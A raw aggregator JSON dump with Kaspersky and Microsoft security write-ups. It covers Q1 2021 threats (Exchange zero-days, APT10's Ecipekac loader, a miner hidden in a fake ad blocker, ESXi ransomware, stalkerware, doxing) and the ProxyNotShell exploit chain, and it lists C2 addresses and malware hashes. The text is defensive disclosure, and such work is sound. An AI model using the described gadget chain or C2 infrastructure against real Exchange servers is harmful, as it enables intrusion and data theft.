During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim's network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. 
Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads QuasarRAT.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor's activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. 
Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim's search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers' servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. 
\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel's processors in its computers. 
The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the "downloadURL" field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. 
The developers of these programs are also updating their code to include support for the M1 chip, including the Pirrit and Bnodlero families.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don't just add support for new platforms: sometimes they use new programming languages to develop their 'products'. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere's a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage data when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. 
Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there's also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person's knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone's activities. Notwithstanding the _relative_ decline, 53,870 is a big number. 
Moreover, these are numbers of Kaspersky customers: no doubt the real figure is considerably higher.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\n| Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\n| Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it's difficult for anyone targeted with such programs to see that 
it's installed on their device \u2013 they hide the app's icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. 
The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, including those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data, or access to company resources \u2013 for example, credentials allowing access to cloud-based systems. \nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a "test" message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient's mail client and the IP address. This data lets the attackers build a profile on a specific person who they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. 
For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to "phish" corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee's account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company's reputation and result in financial loss. 
There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO's voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company's branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-19T16:54:06", "description": "\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. 
As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to the earlier ProxyShell attack chain, a set of similar vulnerabilities in Exchange Servers disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Through insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a valid login and password combination for a registered account can gain access to the privileged endpoint of the Exchange Server API (**https://%exchange server domain%/powershell**). 
This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. 
In the published PoC, this process is **calc.exe**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start a new process_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post-exploitation\n\nA few weeks after the vulnerabilities were disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various DLL hijacking attempts (including dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials needed to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side, every process started via exploitation has the same parent process with a characteristic command line: **w3wp.exe -ap "msexchangepowershellapppool"**.\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by 
[TrendMicro](<https://www.trendmicro.com/pl_pl/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html>), the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post-exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other zero-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect connections to attacker-controlled infrastructure.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of the current TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. 
Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nMD5 | File name | Description | Detection name \n---|---|---|--- \nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok, HEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n\nNetwork indicator | Description \n---|--- \n193.149.185.52:443 | C2 server \nsync.service.auzreservices.com | C2 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. 
Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "href": "https://msrc.microsoft.com/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:07:39", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. 
We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "href": "/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. 
Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 